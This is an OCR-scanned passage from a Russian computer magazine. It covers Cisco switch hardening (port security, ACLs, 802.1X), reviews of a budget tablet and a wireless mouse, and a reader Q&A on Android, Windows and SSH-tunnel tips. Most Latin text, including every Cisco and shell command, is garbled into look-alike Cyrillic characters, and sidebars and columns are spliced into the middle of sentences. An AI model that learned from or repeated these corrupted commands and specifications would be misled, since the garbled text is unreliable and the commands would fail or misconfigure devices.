сав заголовке кадра и ОНСР-сообщении не совпадают, то кадр отбрасывается. Еще 
можно ограничить количество ОНСР-сообщений (в секунду) для данного порта: 


(сопй8-1+)# 1р АПср °поор1пв 1111% гафе 100 


ТЕХНОЛОГИЯ РОВТ5ЗЕСУНТУ 

Пусть есть коммутатор С!5со 2960, на борту которого 48 портов Га\Е тете. К пор- 
там подключены розетки. Требуется реализовать политику, согласно которой к ро- 
зетке можно подключить только один компьютер, создав препятствие к стихий- 
ному возникновению сетей на основе нелегальных ЗОНО-коммутаторов, а также 
пресечь попытки МАС-флудинга свитча. 

В документации сказано, что технология Рой Зесищу позволяет регулировать 
входной трафик устройства С!5со путем ограничения (и идентификации) активных 
МАС-адресов на порту. А это, по сути, и требуется в данном случае. 

Конечно, ограничение количества МАС-адресов — мера условная, и ее можно 
обойти, например с помощью 5ОНО-роутера с настроенной трансляцией сетевых 
адресов. Но во-первых, мы рассматриваем проблему в разрезе канального уров- 
ня. Во-вторых, ЗОНО-роутер дороже 5ОНО-коммутатора. А в-третьих, от попыток 
флудинга Ром Зеситйу таки защищает. 

В режиме конфигурирования укажем диапазон настраиваемых портов: 


# 11% гапёе Фа 0/1 - 48 


И непосредственно настройка портов (они уже находятся в ассе$$ тоде): 


(сопйё-1+-гапве)# $зм1ЕсИрогЕ рог*-зесиг1 у 

(сопй8-1+-гапве)# зм1ЕсПрогЕ рог*-зесиг1у \у1о1а1оп рго%есЕ 
(сопЯ8-1+-гапве)# зм1ЕспрогЕ рог*-зесиг1у тах1тит 1 
(сопй8-1+-гапве)# зм1ЕспрогЕ рог*-зесиг1у тас-аЧ4аге$$ $Е1ску 


Первая строка — включаем Рой Зесищу. Вторая — определяем действие 
при нарушении политики безопасности. Третья задает количество разрешенных 
на порту МАС’ов (по умолчанию 1). Четвертая включает добавление обнаруженных 
на порту МАС’ов в гипптд-сопйд (если сохранить в За\ир-сопйд, то будет дей- 
ствительно и после перезагрузки). 

Режим ргфес{ — самый «гуманный» из возможных способов реакции на превы- 
шение допустимого количества МАС’ов. Трафик тахитит адресов, «засветивших- 
ся» раньше других на этом порту, будет разрешен. Кадры от «лишних» источников 
будут отбрасываться. Режим геи с{ — то же, что и ргоесф но отправляется ЗЭММР- 
трап, и делается запись в $у$04 (а еще счетчик инцидентов тикает). 

Есть еще режим зпщаомт (по умолчанию) — если количество МАС’ов больше 
пахитит, то порт отключается (еггог-ЧзаЫеа). Здесь опять будет полезным на- 
строить автоматическое включение порта через заданное время после инциден- 
та (еггЧзаЫе гесоумегу саизе рзесиге-мо!аНоп), чтобы каждый раз не писать «по 
эзАщаом/п» вручную. 

С помощью Рой Зеситу можно создавать что-то вроде АСЕ канального уровня. 
Пусть, например, требуется разрешить доступ к порту только данным трем ком- 
пьютерам. Решение заключается в выставлении тахитит в 3 и указании всех трех 
МАС-адресов с помощью параметра тас-адагезз: 


1пфегРасе Ра5Е{Пегпет@/3 

$1 сПрогЕ то4е ассе$$ 

$1 сПпрогЕ рог*-зесиг1у 

$1 сПрогЕ рог*-зесиг1у тах1тит 3 

$1 сПрогЕ рог*-зесиг1у у1о1а1оп рго*фесЕ 
$м1сИрогЕ рог*-зесиг1у тас-аЧдагез5$ 0000.0100.с264 
$м1сИрогЕ рог*-зесиг1у тас-адаге$з$ 0000.0100.+09аа 
$1 сПпрогЕ рог{-зесиг1Фу тас-адагез5 0000.0100.+178 


АСЕНАВСЮ КАТУШКУ 

В старых коммутаторах 2950 работа с листами контроля доступа (!Р и МАС) была 

возможна только на улучшенных версиях прошивок. У свитчей 2960 эта опция ста- 

ла частью базового ПО (ЕАМ Вазе). На этих устройствах на физические интерфей- 

сы можно добавлять следующие виды входящих (т) АСЕ: 

1. Стандартные1Р АСЕ на основе 'Р-адреса источника (номера 1-99 и 1300-1999). 

2. Расширенные 1Р АСЕ на основе ПР-адресов источника и получателя, а также оп- 
ционально на типе протокола (100-199 и 2000-2699). 

3. Расширенные МАС АСЕ на основе МАС-адресов источника и получателя, а так- 
же опционально на типе протокола. 


Если номеров будет мало, можно использовать символьные имена (МАС- 
списки у 2960 только именованные). В работе с АСЕ два этапа: создание списка 


1.3.3 


ТУДА-СЮДА-ТУДА 


В консоли для выполнения команды $По\м/ часто 
приходится выходить из режима конфигурирования, 
а потом снова набирать «соп{Ъ» и так далее. Чтобы 
сэкономить время, используй 4о, например: «Чо $По\м/ 
р гоще». 


РАЗДЕЛЯЙ И ВЛАСТВУЙ 


Используя ТЕТР, в устройство можно заливать конфиг 
не только целиком, но и частями (настройки интер- 
фейсов, АСЕ и прочее). Разложи эти куски по отдель- 
ным файлам и добавь в начале каждого команду по 
(по ицегасе..., по ассе$$-1$1...), чтобы предваритель- 
но удалить старый фрагмент конфигурации. 


РЕЖЕМ \ЁАКЫ 


В настройках транка (змиспрой тоде {гипк) можно 
указать, какие УГАМ’ы на нем запрещены/разреше- 
ны. Например, чтобы разрешить только заданные 
сети: «змйспроггипк а!Йомеа мап 2,999». Чтобы 
запретить: «з\ммИспройгипк ргипта Мап 5». 


\ЕАМ НОРРИМ@ ПО УМОЛЧАНИЮ 


Одна из особенностей конфигурации по умолчанию у 
коммутаторов С1$со состоит в том, что на всех портах 
включен протокол ОТР ($миспрой тоае аупатс 
аезиаы!е). Он позволяет автоматически устанав- 
ливать тегированное транковое соединение, если 
вторая сторона его поддерживает. Это, конечно, 
удобно, но если на том конце патчкорда окажется 
злоумышленник — ему не составит труда «вытянуть» 
доступные \УЁЕАМ’ы локальной сети. Поэтому для 
устройств, доставаемых из коробки, лучше сразу вы- 
ключить все неиспользуемые порты ($АщаАом/т) или 
принудительно установить режим доступа ($м\спрой 
тосе ассе$$) для них. В последнем случае желатель- 
но назначать таким портам какой-нибудь незадей- 
ствованный (гостевой) УЁАМ ($м\спрой ассе$$ мап 
13) или считать УЁАМ 1 гостевым. 


ЗАЩИЩАЕМ КОНСОЛЬ 
КОММУТАТОРА 


Для ограничения доступа к администрированию 
сетевые интерфейсы устройств можно разместить 
в отдельном \/1АМ, «отгороженном» от остальной 
сети межсетевым экраном. В коммутаторах С!$со 
управляющий \УЁЕАМ задается установкой 1Р-адреса 
на соответствующий УЕАМ-интерфейс. 


134 $УМ/АСК 


ГЕЕЕ 802.1Х (40НХ) — это давно извест- 
ная технология, которая предназначена 
для аутентификации и авторизации 

на канальном уровне 


в режиме глобальной конфигурации и применение списка 
с данным номером (именем) к интерфейсу. Так, для привязки 
|Р-адреса к интерфейсу сначала создадим АСЕ номер 5 с одной 
записью: 


# ассе$$-11$5% 5 регт1{ По${ 192.168.1.5 


МГИ 

Действие по умолчанию в списке — запрет всего (4епу апу). 
Поэтому явно его указывать нет необходимости. А затем приме- Сайт С15со: 
ним АСЕ к интерфейсу, на котором «висит» 5-й адрес: С15С0.С0Т 
# 11% 21 0/1 Гиковый ресурс 
сопйв-1+)# 1р ассе$$-вгоир 5 1п про С15со: 

Для обозначения диапазона адресов в АСЕ у С!$со исполь- 
зуется инверсная маска (м асага тазк). После ключевого сло- Сайт про 802.1Х и С15со: 
ва еа в АСЕ для протокола ТСР можно указать порт назначения. 000.9/ст22е 
Например, запрещаем доступ из «первой» подсети в «нулевую» 
по протоколу Тете: 
# ассез$-115% 102 аепу ср 192.168.1.0 0.0.0.255 += 

192.168.0.0 0.0.0.255 ед те1пе* 
# ассе$$-11$5% 102 регт1{ {ср апу апу 

С помощью именованных МАС АСЕ можно фильтровать не- 
|Р-трафик (в том числе и на основе физических адресов). На- 
пример, так выглядит лист контроля доступа, запрещающий 
протокол пе 05: 
# тас ассе$$-11${ ехфепаеад к111п65 
(сопйё-ехЕ-тас1)# аепу апу апу пефЬ1о5 
(сопяё-ех{-тас1)# регт1{ апу ап 

Чтобы применить его на интерфейсе: 
# 11% 21 0/2 
(сопЯё-1+Р)# тас ассез$$-вгоир К111пб5 1п 
ПЕРЕХОДИМ НАЛИЧНОСТИ... 
Персонифицированный доступ к ресурсам сети является трен- Укоммутаторов С!$со 
дом, который сложно игнорировать. Во-первых, в Лету канули естьвеб-интерфейс 


сапа 5т 2960 бегах беуьсе Мотафег 
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те времена, когда рабочие места сотрудников были стацио- 
нарными и можно было легко идентифицировать конкретного 
пользователя по ПР- или МАС-адресу сетевой карты его ком- 
пьютера. С распространением мобильных систем отслеживать 
эти технические характеристики стало накладно. Впрочем, 
концепция ВУОРВ (Випд Уоиг Омт Оемсе) для проводных сетей 
не успела принять таких угрожающих масштабов, так как бес- 
проводные гаджеты быстро вытесняют устройства с Ейета- 
адаптерами. 

Во-вторых, более сложные схемы идентификации (сер- 
тификаты, логины и пароли) предпочтительнее в плане без- 
опасности, чем Р- или МАс-адреса, манипулировать которыми 
не составляет никакого труда. 

1ЕЕЁ 802.1Х (94<{1Х) — это давно известная технология, ко- 
торая предназначена для аутентификации и авторизации на ка- 
нальном уровне. Пользователь и/или рабочая станция, под- 
ключившись к сетевой розетке, не сможет передавать никакой 
трафик (кроме сообщений 802.1Х), пока не пройдет процедуру 
аутентификации. А благодаря авторизации пользователь может 
автоматически помещаться в тот УЁАМ, который определен по- 
литиками безопасности, независимо от точки подключения. 
К этому \УЁАМ можно привязать листы контроля доступа, поли- 
тики Оо$ и тому подобное, то есть персонифицировать сетевой 
доступ по полной программе. 

Собрать стенд для тестирования 802.1Х несложно. Во- 
первых, нужен ВРАОШ$-сервер. Он будет обрабатывать запросы 
на аутентификацию, поступающие от коммутатора с поддерж- 
кой 802.1Х (это во-вторых). В-третьих — клиент 802.1Х на рабо- 
чей станции, который сможет передать необходимые параме- 
тры коммутатору. В этой схеме свитч выступает как посредник 
между РАОШ$-сервером и рабочей станцией в процессе ау- 
тентификации, а также обеспечивает контроль доступа к порту 
и непосредственно авторизацию. 

Настройки 802.1Х на коммутаторе зависят от версии 105. 
В глобальной конфигурации нужно настроить НАБШ5$-сервер, 
модели аутентификации/авторизации и активировать ао 1Х: 


# гаа1и$-зегуег По${ 192.168.1.3 

# гаа1и$-зегуег Кеу гад1изКеу 

# ааа пем-тоае1 

# ааа ач{Иеп*1са{1оп 40%1х аефаи1 вгоир гаа1и$ 
# ааа ачИог17а*1оп пефмогк аефаи1{ вгоир га@1и$ 
# 90{1х зузфет-ацЕИ-сопго1 


Далее нужно включить 802.1Х в настройках соответствую- 
щих портов: 


(сопЯ-1+)# ао{1х рогЕ-сопфго1 аифо 


Можно также поиграться с /1АМ’ами. Для порта Чо Х мож- 
но установить пользовательский \ТАМ. В него рабочая станция 
помещается после успешной аутентификации. Он прописан 
в настройках порта, как обычно: 


$1 спрогЕ{ ассез$ \]ап <\1ап-14> 


Есть также гостевой \АМ. В него помещаются клиенты, 
не поддерживающие 802.1Х: 


0%1х виез*-у]1ап <\1ап-14а> 


А еще есть Везищеа МАМ. Туда попадает клиент, не про- 
шедший аутентификацию: 


о*1х ачИ-а11 \1ап <\1ап-1а> 


При практическом внедрении 802.1Х в корпоративную сеть 
придется учесть множество моментов: выбор программно- 
го обеспечения для аутентификации, настройка протокола ПР 
на рабочих станциях, различные сценарии работы пользовате- 
лей в сети, согласование групповых политик и так далее. В об- 
щем, это тема для отдельного разговора. 


ЗАКЛЮЧЕНИЕ 

Хороший коммутатор может дать немало для безопасности ло- 
кальной сети. Еще больше может сделать хороший специалист, 
который сумеет настроить этот коммутатор. = 


На правах рекламы 


136 Ееггит 
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ДОСТУПНЫЙ >” 


ХАРАКТЕРИСТИКИ 


Операционная система: 

Апагота 4.1.1 

Дисплей: 9,7", 1024 х 768, 4:3 
Система на чипе: ВоскСтр 
АКЗО6б, 1,6 ГГц (процессор АВМ 
Соцех-А9, видеопроцессор Май 400) 
ВАМ: 1 Гб, О0АЗ 

Встроенная память: 8 Гб 
Поддержка карт памяти: п!сго$0 
Камеры: 2 Мп (фронтальная), 2 Мп 
(тыловая) 

Аккумулятор: 1!-ро!, 7200 мА : ч 
Беспроводные сети: \/-Е! 802.11 
6/д/п, Вшетоо{й 4.0 

Разъемы: тисго0ЗВ, 3,5 мм (мини- 
джек), слот т!сго$0 

Габариты: 243 х 190 х 9,4 мм 

Вес: 600 г 

Комплектация: планшет, кабель 
ОТО (У$В — тегоу5В), кабель 
05В, зарядное устройство и три 
переходника для разных типов 
розеток, наушники 


РЕЗУЛЬТАТЫ 
ТЕСТИРОВАНИЯ 


АпТиТи ВепсптагК у. 3.2.1 

СРУ в целом: 3947 баллов 

ВАМ: 1767 баллов 

ЦП с целыми числами: 2161 

ЦП с плавающей запятой: 1786 
20-графика (768 х 976): 1323 
ЗО-графика (768 х 976): 3811 
Ввод/вывод базы данных: 555 
Запись на карту $0: 103 (10,3 Мб/с) 
Чтение с карты $0: 204 (>50 Мб/с) 
Общая оценка: 11 710 баллов 


нтернет-планшет уже давно не ро- 
скошь и средство демонстрации 
понтов, а нечто привычное и повсед- 
невное, например, как мобильный те- 
лефон. И одна из отличительных особенностей 
данного типа устройств — постоянно снижаю- 
щаяся цена. Если на заре своей популярности 
ценник не опускался ниже 20 тысяч рублей, 
то сейчас можно найти устройство и в два, три, 
даже четыре раза дешевле. Сегодня мы рас- 
сматриваем новинку от швейцарской компании 
ЗО стоимостью около 7 тысяч рублей. 

309 ВС9731С облачен в изящный корпус 
с плавными линиями. Несмотря на то что ос- 
новной материал корпуса — светлый пластик, 
планшет не смотрится дешево. К нам попал 
образец в белом корпусе, но также в продаже 
есть более классическая модель в черном цве- 
те. Интересный элемент дизайна — иллюзия 
того, что задняя крышка покрыта слоем про- 
зрачного стекла. На левой грани ты найдешь 
разъем для наушников и кнопку включения, 
на правой — клавишу «назад», слот для кар- 


точки птсго$0, разъем писгоу$В и динамики, 
а на верхней грани примостились качели гром- 
кости и кнопка меню. 

Планшет поддерживает подключение внеш- 
них устройств через разъем птсгоу$В, ка- 
бель ОТ@ идет в комплекте, поэтому вместе 
с ЗО АС97З1С можно использовать как флешки, 
так, например, и внешнюю клавиатуру. Планшет 
также снабжен двумя камерами по 2 мегапик- 
селя каждая, чего в принципе должно хватать 
для интернет-звонков и фотозаметок из жизни. 
Экран с диагональю 9,7 дюйма выполнен по тех- 
нологии |Р$ и имеет разрешение 1024 х 768, ко- 
торое уже несовременное, но еще пока не окон- 
чательно устарело. 

Железо в планшете показывает неплохую 
производительность, это наглядно продемон- 
стрировано в результатах тестирования. Систе- 
ма на кристалле ВоскСшр АКЗ0Обб построена 
на базе двух ядер АВМ Соцех-А9Э с тактовой ча- 
стотой 1,6 ГГц и имеет видеоядро Ма! 400. $оС 
поддерживает декодирование Ри! НО видео 
со скоростью до 60 кадров в секунду. Графиче- 


Михеева-Капанжа 


ский ускоритель Ма! 400 делает доступным пол- 
ную поддержку ОрепСЕ ЕЗ2.0 и ОрепСЕ Е$ 1.1, 
Ореп\С 1.1, а аппаратный 20-движок с ММУ 
обеспечивает «плавность» выполняемых опе- 
раций, увеличивая производительность дис- 
плея. Действительно, никаких «подергиваний» 
интерфейса, иногда встречающихся у моделей 
данного ценового сегмента, замечено не было. 


ВЫВОДЫ 

Выносить вердикт ЗО АС97З1С нужно, отталки- 
ваясь отего стоимости. Конечно, сейчас на рын- 
ке огромное множество устройств и за более 
низкую цену, вопрос в том, показывают ли они 
столь же интересные результаты, как наш се- 
годняшний подопытный. Симпатичный облик, 
|Р5$-матрица, высокопроизводительная систе- 
ма на чипе (если смотреть в рамках нынешних 
реалий) и возможность подключить внешние 
Ц$В-устройства — что еще нужно счастливому 
обладателю планшета? Возможно, разрешение 
экрана повыше да камеру получше. Но для семи 
тысяч рублей это уже придирки. 2= 
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Доступный помощник 


Швейцарская компания 30 по- 
казала немало новинок на ве- 
сенних технологических кон- 
ференциях ММ/С 2013 и СеВП. 
Не скроем: за успехами ЗО мы 
особенно следим. У этой ком- 
пании есть производство в Рос- 
сии, ав Москве сидит команда 
инженеров, способная с нуля 
разрабатывать успешные моде- 
ли планшетов, которые хорошо 
находят своего потребителя 

(по этой причине на стенде ком- 
пании всегда интересно — есть 
с кем поговорить о том, как во- 
обще происходит работа над 
созданием нового планшета). 
Мы отобрали наиболее инте- 
ресные модели, которые были 


НА ММ/С 


1.57 


2013 


продемонстрированы. 

| Е => чи © 
ВСО813С 0С1020А 0$9735К 0$9728 И 90$9733Н 0$9718СИ 9$97190 
Когда речь заходит о не- В основе модели Топовая модель Более мощные модели Базовая модель от 39 — 
больших планшетах, ОС1020А, недавно по- (9,7-дюймовая не заставят себя ждать. Так, 0$9718С с одноядерным 


обычно подразумевается 
более скромный конфиг 

по сравнению со «старши- 
ми» собратьями. Воти мо- 
дель ВСО813С построена 
на базе не топового, но все 
же неплохо зарекомен- 
довавшего себя двухъя- 
дерного ВоскСпр 3066. 
Девайс имеет 8-дюймовый 
|Р5$-дисплей и приятный 
дизайн, комбинирующий 
белый и персиковый цвета 
на передней и задней па- 
нелях. Цена такого девайса 
с ЗС, 8 Гб встроенной па- 
мяти и батареей емкостью 
4200 мА : ч будет всего 
7500 рублей. 


ступившей в продажу 

с предустановленным 
Уапаех.Тоге, лежит 
двухъядерный процес- 
сор с частотой 1 ГГц, гиг 
оперативки и 16 Гб ос- 
новной памяти. Несмотря 
на большую диагональ, 
устройство получилось 
очень легким — при тол- 
щине корпуса 7,9 мм его 
вес составляет всего 
527 г Столь выдающихся 
характеристик удалось 
достигнуть за счет до- 
рогостоящей разработки 
совместно с МЕС. Цена 
устройства в России — 
12 500 рублей. 


0$59735К), построенная 
на базе процессора 
бпарагадоп 800 (на 
сегодняшний день один 
из самых мощных чипов), 
ожидается во второй по- 
ловине года. Напомним, 
что Зпарагадоп 800 име- 
ет четыре процессорных 
ядра 2,3 ГГц и графиче- 
ское ядро Аагепо 330, 
что позволяет решать 
по-настоящему «тяжело- 
весные» для мобильной 
платформы задачи — 

к примеру, обрабатывать 
три потока Ри! НО видео 
одновременно. 


скоро появится $9728 с уже 
двухъядерным процессором 


М$М8225 и О$З9ЭТ7ЗЗН наче- 
тырехъядерном Зпарагадоп 
200 (чипсет Оцасотт 
М$М82250). Дизайн у них 


будет одинаковым. Нужно по- 


яснить: компания выпускает 
огромное количество моде- 


лей с разной конфигурацией 


(для разных потребителей 
и разных задач), но с огра- 
ниченным (хотя и большим) 
набором дизайна корпусов. 
Поэтому при одинаковом 
внешнем виде планшетов 
под капотом может быть 
как более скромный, так 

и очень внушительный 
конфиг. 


процессором Очасотт 
М$М7227А и экраном 9,7" 
(9500 рублей). Это довольно 
нетипично для бюджетных 
моделей, для которых произ- 
водители зачастую выбира- 
ютчипмейкеров попроще. 
Здесь же стоит Оцасогт, 
чипы которого традиционно 
более дороги, но известны 
своей стабильностью. Кстати, 
М$М7227А имеет слот для двух 
$ М-карт (может пригодиться 
в роуминге, когда для поездки 
покупается отдельная симка). 
Другая модель — 90$97190 — 
имеет процессор 1,4 ГГц 
(М$М8255) с поддержкой МЕС 
и ГЛОНАСС и будет стоить 10 
500 рублей. 
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ХАРАКТЕРИСТИКИ 


Тип датчиков: Но|е[е$$ (оптический 
с диодной подсветкой, две линзы) 
Разрешение сенсора: 
800/1000/1200/1600/2000 ар! 
Частота опроса: 125—500 Ги 
Количество кнопок: 

7 (программируемые) 

Встроенная память: есть 
Интерфейс: И5В, беспроводной 
(2,4 ГГц) 

Длина шнура: 50 см 

Габариты: 102,5 х 65 х 38,7 мм 
Вес: 77г 

Комплект поставки: мышь, У$В- 
приемник, И5В-кабель, гарантийный 
талон 


достойная работа сенсора, 
защищенность 
отличное качество приема 
сигнала 
расширенные функциональные 
возможности 
встроенный аккумулятор, низкая 
цена 
— интерфейс софта пора обновить 
— хотелось бы видеть больше 
кнопок, колесо прокрутки уходит 
в сторону 
— глянцевая поверхность 


Ееггит 


еглый взгляд на мышь @11 от ААТЕСН не сулил 

никаких сюрпризов — обычный, ничем не при- 

мечательный компактный манипулятор для мо- 

бильного применения. Вроде и так, но не тут-то 

было! При близком знакомстве обнаружились 
интересные особенности. Пожалуй, наиболее яркой за- 
явкой в афише оказалось использование встроенного 
аккумулятора. На своем веку повидали немало мышек, 
но такие — редкость. И это лишь верхушка айсберга — 
проводного соединения с компьютером нет, то есть оно 
формально есть, но только для подзарядки батареи. К на- 
шему удивлению, подопытная оснащена разъемом пита- 
ния, аналогичным для телефонов Мона. Если завалялся 
адаптер питания, не стоит его выбрасывать. С его помо- 
щью можно зарядить аккумулятор мыши в поездке. Ком- 
плектный же ЧУЗВ-кабель очень короток. Во время зарядки 
колесо прокрутки подсвечивается красным диодом, после 
окончания — гаснет. 

Вернемся к героине: С11 скромна в размерах, форма 
эргономичная, заточена под правую руку. Основные кноп- 
ки широки и весьма отзывчивы. Они являются прямым 
продолжением верхней части крышки. Тип пластика — гля- 
нец. Хорошо хоть боковые вставки сделаны из рельефного 
пластика — удобнее держать мышку. Боковые клавиши 
одинаково доступны, ниже под большой палец предусмо- 
трено углубление для обеспечения комфорта. Про блок 
с колесом прокрутки мы умышленно умолчали до этого 
момента, там нас ждут сюрпризы, среди которых кнопка 
смены чувствительности сенсора позади и еще кнопка 
специального назначения впереди. Первая не поддается 
программированию, вторая же способна на многое бла- 
годаря софту О#се пище. На кнопку можно навесить 
до пяти значений. Поначалу пришлось ломать голову, 
как же между ними переключаться. Все оказалось просто: 
зажимаем левую кнопку, далее кликаем правую — меняем 
функцию в цикле. Гениально! Софт предусматривает массу 
опций, включая использование значений клавиатуры и за- 
пуск программ, но звездой программы стала функция «16 
в 1». Она отслеживает жесты мыши, приводя в действие те 
или иные функции, например прокрутку вниз. Все жесты 
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можно настроить вручную. ПО включает и другие модули, 
например настройку канала, прокрутки и работы беспро- 
водного сигнала. Есть и модуль проверки уровня заряда, 
правда, он не работал. Использовали последнюю доступ- 
ную версию ПО — 12.04\27. К слову сказать, внешность 
О Нсе эпи\е вызывает вопросы и на фоне окошек М/п9ом/5 
7/8 выглядит архаично. 

А что же колесо прокрутки? Оно работает тихо, сраба- 
тывает четко, сила нажатия средняя. Лишь один момент 
озадачил — наклоны не поддерживаются, но при легкой 
попытке сдвинуть колесо влево оно поддалось с характер- 
ным звуком, аналогично и встает в оригинальное положе- 
ние. Возможно, не повезло с семплом. 

АДТЕСН делает акцент на свой сенсор. Он хорош тем, 
что надежно защищен и для более точного позициониро- 
вания использует систему из двух линз. Чувствительности 
в 2000 ар! при работе с дисплеями со сверхвысоким раз- 
решением некоторым будет маловато, в остальном все 
ОК. Лагов в процессе работы не было, более того, радиус 
действия оказался отличным — даже после того, как мышь 
была депортирована в дальнюю комнату, все работало. 

На основании мыши расположены четыре скромные 
вставки, их оказалось достаточно для хорошего скольже- 
ния на тряпичной поверхности, но маловато для жестких 
ковриков. Кроме этого, в основании мыши расположен 
(5В-передатчик, способный параллельно работать с дру- 
гими устройствами компании. 

Проверить длительность работы от одного заряда 
не удалось, но что-то подсказывает, что запас достаточно 
большой, не месяцы, конечно, но недели. При этом вы- 
ключатель не предусмотрен, мышь засыпает через опре- 
деленное время простоя (регулируется в ПО). 


ВЫВОДЫ 

АДТЕСН С11-570НХ порадовала. Мы никак не ожидали, 
что все окажется столь радужно, хоть и не без недочетов 
вроде глянцевого пластика и момента с колесом прокрут- 
ки. Однако низкая цена, отличный прием сигнала с ми- 
нимальным лагом и функциональные возможности явно 
склоняют чашу весов в пользу обозреваемой мыши. == 


ЕСТЬ ВОПРОСЫ — ПРИСЫЛАЙ 
НАЕАО@ВЕАЕ.ХАКЕРВИ 


Изменил программное значение разре- 

шения экрана своего Апагоа-смартфона 
на более низкое в файле Бийа.ргор. Результат 
порадовал — элементы управления стали 
меньше, да и экран так выглядит красивее. 
Но многие приложения из маркета стали недо- 
ступными, а некоторые и вообще пропали. 
Как пофиксить? 

Проблема в том, что некоторые разработ- 

чики запрещают своим приложениям ра- 
ботать на экранах с низким разрешением. Есть 
несколько способов решить проблему. Ты мо- 
жешь вернуть значение ар!, загружать приложе- 
ния другим путем (то есть не из маркета) или же 
заинсталлировать на смарт модифицированный 
Рау Маркет. Первые два способа, очевидно, 
не представляют интереса, последний же досто- 
ин внимания. Особенно если учесть, что пользо- 
ватель Патеуг с форума ХРА деуеюорег$ создал 
специализированную \\пом/5-утилиту под на- 
званием Сооде Р!ау ОР! Ех Тоод|, которая превра- 
щает процесс модификации Р!ау Маркета в не- 
сколько кликов. Узнать подробности об утилите 
и скачать ее можно с официальной ветки на ХПА: 


Би [у/Сизот РИ. 


Как печатать в консоль \М/Иптпао\м$ цветной 

текст из Руоп’а? Пробовал АМ$|- 
последовательности: под линуксом все отлич- 
но, апод виндой не получается. 

Чтобы заставить работать в консоли \Мт- 

ом/5 управляющие АМ$!-последователь- 
ности, нужно включить в окне команд (ста) под- 
держку АМЗ!.$\$5. О том, как это сделать, 
подробнее здесь: зирро{.п!сго$ой.сот/ 
кЬ/101875. Но я рекомендую тебе воспользо- 
ваться кросс-платформенным решением 
Соогата ( .ру{Поп.ог Исо!огата), кото- 


"тс сук РЕ М лена ПУ -а она 6..2 
ег ог ИтергазаРе саррорастоо. Н1Т туда раза 


Риап хня 
МЕНЕ о м ИНК 


Подсветка вывода вконсоли 


рое использует те же управляющие последова- 
тельности, а для \Ипао\м/$ заменяет их на вызовы 
соответствующих М/п32-функций, которые ме- 
няют цвет текста. 


На ленте проводника в \Пптпао\$ 8 

наконец-то появилась команда Сору 
ра\й, но, например, на рабочем столе и в сто- 
ронних файл-менеджерах ленты нет. Как бы 
добраться до команды из контекстного меню 
файла? 

Необходимая \М/паом$ ЗпеРу информация 

об этих командах лежит в ветке реестра: 


НКЕУ_ГОСАЕ_МАСНТМЕ\$Оомаге\М1сго$о+ \+ = 
Итпаом$ \Сиггеп\/ег$1оп\Ехр1огег\- 
Соттапа5оге\$Пе11 


Например, команда Сору ра в подразделе 
М/паом/5.соруазрай. Чтобы добавить эту коман- 
лу в контекстное меню файла, любым способом 
скопируй этот подраздел в ветку НКЕУ СТАЗЗЕ$ _ 


У 


Роман Гоций 
0015$тотап@дтан.сот 


@) Кип а$ адтиуемайог 


(СЯ Едимаь Моерад+ + 


ЗВаге мВ 


Сору ра в действии 


ВООТ\*\, где вместо звездочки может быть кон- 
кретный тип файла (.тр3, ./рд, ес.). 


Время от времени по непонятным причи- 

нам умирает $$Н-туннель. Как лучше 
всего организовать его своевременный пере- 
запуск? 

Есть отличное решение твоей проблемы: 

супервизор НипК, который позиционирует- 
ся в качестве замены стандартным системам 
инициализации УМХ. В большинстве сборок 
Чпих ВипЁ уже доступен из стандартных репози- 
ториев. Для того чтобы твой туннель не падал, 
демонизируем его с помощью Випйк: 


# аре-веф 1п$фа11 гип1 

# шКа1г /ефс/5у/1ттогфа1-Фип 

# саф <<'ЕОЕ' | ее /ежс/$\м/-ы 
ипбгеаК-Фип/гип 

#1! /Б1п/Ба$п 

ехес 2>&1 

сИрзЕ -и изег $5 -Ё 8888 : По${ : 80 ‹! 


КЛОНИРУЕМ МИМО0\!$-СИСТЕМУ НА СВОЙ КОМПЬЮТЕР, НЕ ТРОГАЯ ТАБЛИЦУ РАЗДЕЛОВ НОО 


Начиная с \ММпао\м$ 7, операционные системы 
от Мсго$о поддерживают технологию 
встроенной загрузки (паНуе Боот) с УНО- 
образов. Технология интересна, так как по- 
зволяет безопасно загружать любую систему 
прямо на железе без родительской операци- 
онной системы, виртуального компьютера 
или гипервизора, без риска испортить табли- 
цу разделов. А воспользовавшись утилитой 
О1$К2упа, мы сможем создавать полную 
копию уже существующей системы. Давай 
рассмотрим, как это работает. 


Первым делом определимся с задачей 
и проверим, выполняются ли требова- 
ния к оборудованию. Гостевой системой 
унас будет ММпао\м5 8, а клонировать будем 
семерку. Проверь, имеет ли локальный диск 
компьютера хотя бы два раздела: системный 

(на котором восьмерка, а также ВСО) и другой, 
на котором будет лежать наш \/НО-образ, причем 
на последнем должно быть достаточно свободно- 
го места для расширения \/НО до его макси- 
мального размера (размера винта компьютера 

с семеркой) и для файла подкачки. 


Если требования выполняются, перей- 

дем кклонированию системы. Для этого 

воспользуемся упомянутой утилитой 
от Марка Руссиновича и Брайса Когсуэлла 
О1зК2упа (Би.1у/О1$К2упа). Как ты уже догадался, 
она преобразует реальную физическую машину 
в виртуальный жесткий диск УНО. Интерфейс 
утилиты предельно прост (смотри скриншот), 
как и работа с ней: отметь нужные диски, выбери 
место для сохранения (кстати, быстрее будет, 
если сохранять на другой винт, например внеш- 
ний) и жми «Сгезже». 
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УНО Ре пате: 
САОМАМСОТЗГУ-РС М9 
Уоклтке$ 30 ии: 


Опуе 135е $е Ргее 


[@] с:\ [№125] 97.8968 4.0768 
Г] о:\ [№12 135.9468 92.4268 


Интерфейс О!5К2упа 


изег@гетофе_По$* 


ЕОЕ 

# сито +х /ефс/зу/1ттога1-Еип/гип 

# п -5$ '../5\/1ттогфа1-%ип' /ефс/+- 
5ег\у1се/ 


Конечно, замени опции команды $$1 на свои. 
После выполнения последней строчки (создания 
симлинка) будет создан туннель, работу которого 
можно остановить, только остановив службу: 


# 5, зфор 1ттогфа1-Фип 


[2] Как запросить из Ба{-файла права адми- 
нистратора? 
А Легальных способов сделать это я не знаю, 
но могу порекомендовать тебе один трюк. 
Идея состоит в том, чтобы батник, в случае если 
он запущен без прав админа, создавал во времен- 
ной папке \/В$-скрипт и записывал в этот скрипт 
команды на запуск себя, но уже с админскими пра- 
вами. После этого данный \В$-скрипт запускает- 
ся, тем самым запуская твой скрипт с привилегия- 
ми админа. Конкретный пример реализации трюка 
можешь посмотреть здесь: Бй.у/Ва1@о{Адти. 


Разрабатываю веб-приложение для мо- 

бильных платформ. В нем широко ис- 
пользую 5\УС-файлы. Но недавно обнаружил, 
что стандартный браузер в андроидах версии 
ниже 3 не поддерживает $\УС. Может, есть ка- 
кой-нибудь хак? А то отказываться от 5\/@ уже 
поздно. 


После того как система с нашей машины 
